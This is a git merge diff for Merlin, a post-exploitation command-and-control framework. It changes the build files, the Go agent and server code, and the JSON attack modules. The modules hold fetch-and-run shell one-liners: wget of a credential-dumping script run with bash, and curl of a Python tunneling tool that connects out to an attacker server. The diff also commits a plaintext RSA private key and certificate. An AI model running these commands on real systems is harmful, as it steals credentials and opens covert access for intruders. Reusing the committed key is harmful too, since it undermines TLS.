Merge pull request #5 from Ne0nd0g/dev

Dev

.gitattributes

@@ -0,0 +1,5 @@
+*.go linguist-language=Go
+*.json linguist-language=Javascript
+vendor/* linguist-vendored
+docs/* linguist-documentation
+data/bin/powershell/Invoke-Merlin.ps1 linguist-detectable=false

.github/ISSUE_TEMPLATE/bug_report.md

@@ -0,0 +1,25 @@
+---
+name: Bug report
+about: Create a report to help us improve
+
+---
+
+### Prerequisite
+* [ ] I have read the [README](https://github.com/Ne0nd0g/merlin/blob/master/README.MD)
+* [ ] I have search the opened & _closed_ [issues](https://github.com/Ne0nd0g/merlin/issues)
+* [ ] I have search the [WIKI](https://github.com/Ne0nd0g/merlin/wiki) and its [FAQ](https://github.com/Ne0nd0g/merlin/wiki/FAQ) page
+### Environment Data
+* Merlin Version:
+* Merlin Build:
+* Go Version:
+* GOPATH Environment Variable:
+* GOROOT Environment Variable:
+* Operating System:
+
+### Expected Behavior
+
+### Actual Behavior
+
+### Steps to Reproduce Behavior
+
+### Misc Information

.gitignore

@@ -3,7 +3,6 @@ data/agents
 data/temp
 data/db
 data/log
-data/x509
 data/bin/darwin
 data/bin/dll/merlin.dll
 data/bin/linux

Makefile

@@ -9,8 +9,11 @@ PASSWORD=merlin
 BUILD=$(shell git rev-parse HEAD)
 DIR=data/temp/v${VERSION}/${BUILD}
 BIN=data/bin/
-LDFLAGS=-ldflags "-s -X main.build=${BUILD}"
-WINAGENTLDFLAGS=-ldflags "-s -X main.build=${BUILD} -H=windowsgui"
+XBUILD=-X main.build=${BUILD} -X github.com/Ne0nd0g/merlin/pkg/agent.build=${BUILD}
+URL ?= https://127.0.0.1:443
+XURL=-X main.url=${URL}
+LDFLAGS=-ldflags "-s -w ${XBUILD} ${XURL}"
+WINAGENTLDFLAGS=-ldflags "-s -w ${XBUILD} ${XURL} -H=windowsgui"
 PACKAGE=7za a -p${PASSWORD} -mhe -mx=9
 F=README.MD LICENSE data/modules docs data/README.MD data/agents/README.MD data/db/ data/log/README.MD data/x509 data/src data/bin data/html
 F2=LICENSE
@@ -54,7 +57,7 @@ agent-windows:
 # Compile Agent - Windows x64 DLL
 agent-dll:
 	export GOOS=windows GOARCH=amd64 CC=x86_64-w64-mingw32-gcc CXX=x86_64-w64-mingw32-g++ CGO_ENABLED=1; \
-	go build -buildmode=c-archive -o ${DIR}/main.a cmd/merlinagentdll/main.go; \
+	go build ${LDFLAGS} -buildmode=c-archive -o ${DIR}/main.a cmd/merlinagentdll/main.go; \
 	cp data/bin/dll/merlin.c ${DIR}; \
 	x86_64-w64-mingw32-gcc -shared -pthread -o ${DIR}/merlin.dll ${DIR}/merlin.c ${DIR}/main.a -lwinmm -lntdll -lws2_32
 
@@ -76,16 +79,17 @@ agent-linux:
 
 # Compile Server - Darwin x64
 server-darwin:
-	export GOOS=darwin;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MSERVER}-${D}.dmg cmd/merlinserver/main.go
+	export GOOS=darwin;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MSERVER}-${D} cmd/merlinserver/main.go
 
 # Compile Agent - Darwin x64
 agent-darwin:
-	export GOOS=darwin;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${D}.dmg cmd/merlinagent/main.go
+	export GOOS=darwin;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${D} cmd/merlinagent/main.go
 
 # Update JavaScript Information
 agent-javascript:
 	sed -i 's/var build = ".*"/var build = "${BUILD}"/' data/html/scripts/merlin.js
 	sed -i 's/var version = ".*"/var version = "${VERSION}"/' data/html/scripts/merlin.js
+	sed -i 's|var url = ".*"|var url = "${URL}"|' data/html/scripts/merlin.js
 
 # Make directory 'data' and then agents, db, log, x509; Copy src folder, README, and requirements
 package-server-windows:
@@ -98,22 +102,25 @@ package-server-linux:
 
 package-server-darwin:
 	${PACKAGE} ${DIR}/${MSERVER}-${D}-v${VERSION}.7z ${F}
-	cd ${DIR};${PACKAGE} ${MSERVER}-${D}-v${VERSION}.7z ${MSERVER}-${D}.dmg
+	cd ${DIR};${PACKAGE} ${MSERVER}-${D}-v${VERSION}.7z ${MSERVER}-${D}
 
 package-agent-windows:
 	${PACKAGE} ${DIR}/${MAGENT}-${W}-v${VERSION}.7z ${F2}
 	cd ${DIR};${PACKAGE} ${MAGENT}-${W}-v${VERSION}.7z ${MAGENT}-${W}.exe
-	cp ${DIR}/${MAGENT}-${W}.exe ${BIN}windows
+	mkdir -p ${BIN}windows
+	cp ${DIR}/${MAGENT}-${W}.exe ${BIN}windows/
 
 package-agent-linux:
 	${PACKAGE} ${DIR}/${MAGENT}-${L}-v${VERSION}.7z ${F2}
 	cd ${DIR};${PACKAGE} ${MAGENT}-${L}-v${VERSION}.7z ${MAGENT}-${L}
-	cp ${DIR}/${MAGENT}-${L} ${BIN}linux
+	mkdir -p ${BIN}linux
+	cp ${DIR}/${MAGENT}-${L} ${BIN}linux/
 
 package-agent-darwin:
 	${PACKAGE} ${DIR}/${MAGENT}-${D}-v${VERSION}.7z ${F2}
-	cd ${DIR};${PACKAGE} ${MAGENT}-${D}-v${VERSION}.7z ${MAGENT}-${D}.dmg
-	cp ${DIR}/${MAGENT}-${D}.dmg ${BIN}darwin
+	cd ${DIR};${PACKAGE} ${MAGENT}-${D}-v${VERSION}.7z ${MAGENT}-${D}
+	mkdir -p ${BIN}darwin/
+	cp ${DIR}/${MAGENT}-${D} ${BIN}darwin/
 
 package-agent-dll:
 	${PACKAGE} ${DIR}/${MAGENT}-DLL-v${VERSION}.7z ${F2}

README.MD

@@ -19,7 +19,7 @@ An introductory blog post can be found here:
 https://medium.com/@Ne0nd0g/introducing-merlin-645da3c635a
 
 
-[![asciicast](https://asciinema.org/a/166722.png)](https://asciinema.org/a/166722&speed=2)
+[![asciicast](https://asciinema.org/a/166722.png)](https://asciinema.org/a/166722?speed=2)
 
 ## Quick Start
 1. Download the latest version of Merlin Server from the [releases](https://github.com/Ne0nd0g/merlin/releases) section

cmd/merlinagent/main.go

@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2018  Russel Van Tuyl
+// Copyright (C) 2019  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -33,17 +33,16 @@ import (
 )
 
 // GLOBAL VARIABLES
-var url = "https://127.0.0.1:443/"
+var url = "https://127.0.0.1:443"
 var build = "nonRelease"
 
-
 func main() {
 	verbose := flag.Bool("v", false, "Enable verbose output")
 	version := flag.Bool("version", false, "Print the agent version and exit")
 	debug := flag.Bool("debug", false, "Enable debug output")
 	flag.StringVar(&url, "url", url, "Full URL for agent to connect to")
 	protocol := flag.String("proto", "h2", "Protocol for the agent to connect with [h2, hq]")
-	sleep := flag.Duration( "sleep", 30000*time.Millisecond, "Time for agent to sleep")
+	sleep := flag.Duration("sleep", 30000*time.Millisecond, "Time for agent to sleep")
 	flag.Usage = usage
 	flag.Parse()
 
@@ -64,4 +63,4 @@ func usage() {
 	fmt.Printf("Merlin Agent\r\n")
 	flag.PrintDefaults()
 	os.Exit(0)
-}
+}

cmd/merlinagentdll/main.go

@@ -2,7 +2,7 @@
 
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2018  Russel Van Tuyl
+// Copyright (C) 2019  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -28,54 +28,54 @@ import (
 	"github.com/Ne0nd0g/merlin/pkg/agent"
 )
 
-var URL = "https://127.0.0.1:443/"
+var url = "https://127.0.0.1:443"
 
 func main() {}
 
 // run is a private function called by exported functions to instantiate/execute the Agent
-func run(url string){
-	a := agent.New("h2",false, false)
-	a.Run(url)
+func run(URL string) {
+	a := agent.New("h2", false, false)
+	a.Run(URL)
 }
 
 // EXPORTED FUNCTIONS
 
 //export Run
 // Run is the main function used to start the Merlin agent taking 1 argument for the Merlin server's address
-func Run(){
+func Run() {
 	// If using rundll32 spot 0 is "rundll32", spot 1 is "merlin.dll,VoidFunc"
 	if len(os.Args) >= 3 {
-		if strings.HasPrefix(strings.ToLower(os.Args[0]),"rundll32"){
-			URL = os.Args[2]
+		if strings.HasPrefix(strings.ToLower(os.Args[0]), "rundll32") {
+			url = os.Args[2]
 		}
 	}
-	run(URL)
+	run(url)
 }
 
 //export VoidFunc
 // VoidFunc is an exported function used with PowerSploit's Invoke-ReflectivePEInjection.ps1
-func VoidFunc() {run(URL)}
+func VoidFunc() { run(url) }
 
 //export DllInstall
 // DllInstall is used when executing the Merlin agent with regsvr32.exe (i.e. regsvr32.exe /s /n /i merlin.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/bb759846(v=vs.85).aspx
 // TODO add support for passing Merlin server URL with /i:"https://192.168.1.100:443" merlin.dll
-func DllInstall(){run(URL)}
+func DllInstall() { run(url) }
 
 //export DllRegisterServer
 // DLLRegisterServer is used when executing the Merlin agent with regsvr32.exe (i.e. regsvr32.exe /s merlin.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/ms682162(v=vs.85).aspx
-func DllRegisterServer(){run(URL)}
+func DllRegisterServer() { run(url) }
 
 //export DllUnregisterServer
 // DLLUnregisterServer is used when executing the Merlin agent with regsvr32.exe (i.e. regsvr32.exe /s /u merlin.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/ms691457(v=vs.85).aspx
-func DllUnregisterServer(){run(URL)}
+func DllUnregisterServer() { run(url) }
 
 //export ReflectiveLoader
 // ReflectiveLoader is used when calling Metasploit's windows/manage/reflective_dll_inject module.
 // This is broken and causes the process to crash
-func ReflectiveLoader(){run(URL)}
+func ReflectiveLoader() { run(url) }
 
 // TODO add entry point of 0 (yes a zero) for use with Metasploit's windows/smb/smb_delivery
-// TODO move exported functions to merlin.c to handle them properly and only export Run()
+// TODO move exported functions to merlin.c to handle them properly and only export Run()

cmd/merlinserver/main.go

@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2018  Russel Van Tuyl
+// Copyright (C) 2019  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -26,19 +26,19 @@ import (
 	"github.com/fatih/color"
 
 	// Merlin
+	"github.com/Ne0nd0g/merlin/pkg"
 	"github.com/Ne0nd0g/merlin/pkg/banner"
-	"github.com/Ne0nd0g/merlin/pkg/servers/http2"
-	"github.com/Ne0nd0g/merlin/pkg/logging"
-	"github.com/Ne0nd0g/merlin/pkg/core"
 	"github.com/Ne0nd0g/merlin/pkg/cli"
-	"github.com/Ne0nd0g/merlin/pkg"
+	"github.com/Ne0nd0g/merlin/pkg/core"
+	"github.com/Ne0nd0g/merlin/pkg/logging"
+	"github.com/Ne0nd0g/merlin/pkg/servers/http2"
 )
 
 // Global Variables
 var build = "nonRelease"
 
 func main() {
-	logging.Server("Starting Merlin Server")
+	logging.Server("Starting Merlin Server version " + merlin.Version + " build " + merlin.Build)
 
 	flag.BoolVar(&core.Verbose, "v", false, "Enable verbose output")
 	flag.BoolVar(&core.Debug, "debug", false, "Enable debug output")
@@ -71,7 +71,10 @@ func main() {
 	if err != nil {
 		color.Red(err.Error())
 	} else {
-		server.Run()
+		err := server.Run()
+		if err != nil {
+			color.Red("[!]There was an error starting the server")
+		}
 	}
 }
 

data/html/scripts/merlin.js

@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2018  Russel Van Tuyl
+// Copyright (C) 2019  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -20,7 +20,7 @@ var debug = false;
 var verbose = true;
 var initial = true;
 var hostUUID = guid();
-var version = "0.6.1.BETA";
+var version = "0.6.3.BETA";
 var build = "nonRelease";
 var waitTime = 30000; // in milliseconds
 var maxRetry = 7;

data/modules/linux/x64/bash/credentials/MimiPenguin.json

@@ -14,7 +14,7 @@
     "options": [],
     "description": "mimipenguin is a bash script used to find plaintext credentials in memory during post-exploitation. Must be run as root. It automates the dumping of memory and searches for Linux user credentials.",
     "commands": [
-      "/bin/sh", "-c", "\"wget -O /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/master/mimipenguin.sh; /bin/bash /tmp/mimipenguin.sh;\""
+      "/bin/sh", "-c", "\"wget -O /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/beta-1.0/mimipenguin.sh; /bin/bash /tmp/mimipenguin.sh;\""
     ]
   }
 }

data/modules/linux/x64/python/pivoting/arox.json

@@ -0,0 +1,30 @@
+{
+  "base": {
+    "name": "AlmondRocks",
+    "type": "standard",
+    "author": ["Kevin Lustic"],
+    "path": ["linux", "x64", "python", "pivoting", "arox.json"],
+    "platform": "linux",
+    "arch": "x64",
+    "lang": "python",
+    "privilege": false,
+    "remote": "https://gist.githubusercontent.com/klustic/14efac58264f5a3f082f8b2731b21c93/raw/459c81af93f78c8f155cbcf16e145d4be62da972/arox.py",
+    "options": [
+      {"name": "host", "value": "", "required": true, "description":"The AlmondRocks server, specified as <IP|Domain>:<Port>"}
+    ],
+    "description": "AlmondRocks (arox) connects out to a public-facing server to tunnel SOCKSv5-wrapped comms in.",
+    "notes": "https://github.com/klustic/AlmondRocks",
+    "commands": [
+      "/bin/bash",
+      "-c",
+      "\"curl -vk -Lo /tmp/arox.py https://gist.githubusercontent.com/klustic/14efac58264f5a3f082f8b2731b21c93/raw/459c81af93f78c8f155cbcf16e145d4be62da972/arox.py; /usr/bin/python /tmp/arox.py {{host}} &\";"
+    ]
+  },
+  "additionalInstructions": {
+    "Setup": [
+      "1. Download AlmondRocks server to a publicly accessible host: https://github.com/klustic/AlmondRocks",
+      "2. Follow the README for AlmondRocks to setup the server"
+    ],
+    "Comments": "The additionalInstructions tag is ignored by Merlin and are for user consumption only."
+  }
+}

data/x509/server.crt

@@ -0,0 +1,21 @@
+-----BEGIN CERTIFICATE-----
+MIIDXTCCAkWgAwIBAgIJAMXjCgaIHqtBMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV
+BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX
+aWRnaXRzIFB0eSBMdGQwHhcNMTYxMDIzMDAzODA3WhcNMjYxMDIxMDAzODA3WjBF
+MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50
+ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
+CgKCAQEAr+gMy078qmcT45NY2cIRsEstXdaMtqH+2WuMy1CofokSPmzpLON1gfIR
+rrumgylZjbGVVA2Md3SGkmdc4rjbLxr/bT3GvDFcNNtVUYewjZebSSy2Hco8icsc
+gDZPB8DV3z/B9x6V4wfnFyIyjjRou9P0jtSfSFDvIWDHqmhTsM1s8kAiwiK1TE0u
+g8MBoysdmdmK/pVgS6ABo8W14gKDMRvKuArr3RxmIqujU363RGQ8KL9KxaSqpP+/
+dSN0mjkoecUFgHvWPOsL1KqU4Ntj5qJdJNwlBPIDmH5+BcU/CvXdAD641N+zSNUD
+PEH0e8PIPNeVtEYY6gIj2gpDgjpQBwIDAQABo1AwTjAdBgNVHQ4EFgQUtr9XjXfj
+t85kkB8xMhZ4Dtl9FRAwHwYDVR0jBBgwFoAUtr9XjXfjt85kkB8xMhZ4Dtl9FRAw
+DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAP6y1atvDy/NdZjDig9wo
+/GaDNvNA/70/C44N6aSo243eicL+0RrRrkh8cp9C6UVRQ/LpfH/Mmhm+MYXJq+dI
+b02mUW7lHgLk+iksIvSa3AmagMAtpeQ6XtWY64COY2aU4jke9Fc6kJkKNR9B9uVP
+8+1g1B13TG6yKy3SAHwlrCL1RYhhxsR8yhLAMrTu4oTBwXEbupwqKxKLdeoBujAR
+xZ7H5ybC7dqGmP4jm1m9zQNkpyalZJbXyIQphWMxHb3/HSCY2j8g8HXGKdO8E1nC
+NEDlULSeCu2dIhi6RyiFqREbKThHNPG0PEUvNVSZHO+zyHpgecQy9u1+fkxsIAJ4
+OQ==
+-----END CERTIFICATE-----

data/x509/server.key

@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEogIBAAKCAQEAr+gMy078qmcT45NY2cIRsEstXdaMtqH+2WuMy1CofokSPmzp
+LON1gfIRrrumgylZjbGVVA2Md3SGkmdc4rjbLxr/bT3GvDFcNNtVUYewjZebSSy2
+Hco8icscgDZPB8DV3z/B9x6V4wfnFyIyjjRou9P0jtSfSFDvIWDHqmhTsM1s8kAi
+wiK1TE0ug8MBoysdmdmK/pVgS6ABo8W14gKDMRvKuArr3RxmIqujU363RGQ8KL9K
+xaSqpP+/dSN0mjkoecUFgHvWPOsL1KqU4Ntj5qJdJNwlBPIDmH5+BcU/CvXdAD64
+1N+zSNUDPEH0e8PIPNeVtEYY6gIj2gpDgjpQBwIDAQABAoIBAHFlnhnSKX+QQ3oJ
+mtWGDfEgBXbgwIVbmPaAJptKu9QWePRVMVwGpdHHQy7pOUaEeX6mZCVzNoIrVDU8
+/NwLXwDW3qKFmH/pMg/A9RdB6cbdXPWnJR+/J5eMoCrm17ufzD/G0juENAvPJGH9
+Yanaj0nGMXmCB8yOoBlcUlrANnNaZ/PXhn2lEW+dmVoY9fHVy4ARDyPvnSyAH2Em
+EoClheLU9+T/CcJShNJC0EQ8UCn2a02+y7XQ4hBxHpjwBxo4aqs9D0DfZoW6AwvW
+HnyL9ozAv9LEx9DHjmWXAYCfqnz5OTjVefPbp+vKWujOGpdxaCUsFigOkIAjDh+0
+KngpkIECgYEA5FCjJe3pcc9g11f+0DpZNmJhnEkS6SnNXTBhMrxi14bua+ZnJj07
+/vBKsK3aQf27PROpbl1CC2HPBAF3AfMXD/3nW1JtjfuaH0UYZs1QHog96sTKk5Ny
+6JfOFOKZXm97c0KxgqoBNoJyac3J7sF2jHzYWDGbc3cGLQQZkwOZi/kCgYEAxTyL
+bN+YCgQUR1I99rBAGsJfQ12he6n1eQ6s9hcthO44Qsm+opGAeZatVIZx3w90dyGg
+vCS73dYmOAWX/areZNv+qV5MF6bFvujnlH1BLm91xfl3WfQYALKcTH2SSaBBOQKK
+Vasmc2wofCIQptPGkguX6yAJ2V/c/7CmBhORu/8CgYByNUAXRhZjfvgTYIovgTCF
+OttXAVq7VdTLy9qjNYdABtgXE27/utvbIDpMfPrTzeeumrpDYdUauneCqnTsfbxI
+nJrxnJ7+yiADil21dvif/UjzujMXdUeiv+Uvn1ZW3e9j7bW8BeyLZt9yu6VKkG4L
+wpu6Kj53mM93Dzj3yHIziQKBgE+lyGPZ0wrQZOP8ORuCRxDHRzLr/4bxtjgBjiT+
+bRpOHJgT4hDCExCGoU4N0LQUCKMHCGKRru/BR8O9tofwVUiDck4wzyeJ6DbU1Jep
+EQZQak3dFK5VnM/DUMyutMFYnp4IAZbgu3FGzv55vyGvSXO2jM2dLX0DcjoqupCf
+nG0/AoGADgm7TSi/ZypZg/BEJS/6/cv9gpYkTv1L4eCENYK2t6dFJZUVwGTCA08Y
+noB9k0JpSUpk53Y/SGRZHhl1YuAwmcIG6Jjz8SPmOfir/+8HlunEXvzybWHE8D20
+id+f6OCGccq5OJ0/tZA6pG8WIc8t1jr3tNhMizoX/RALxNovIM4=
+-----END RSA PRIVATE KEY-----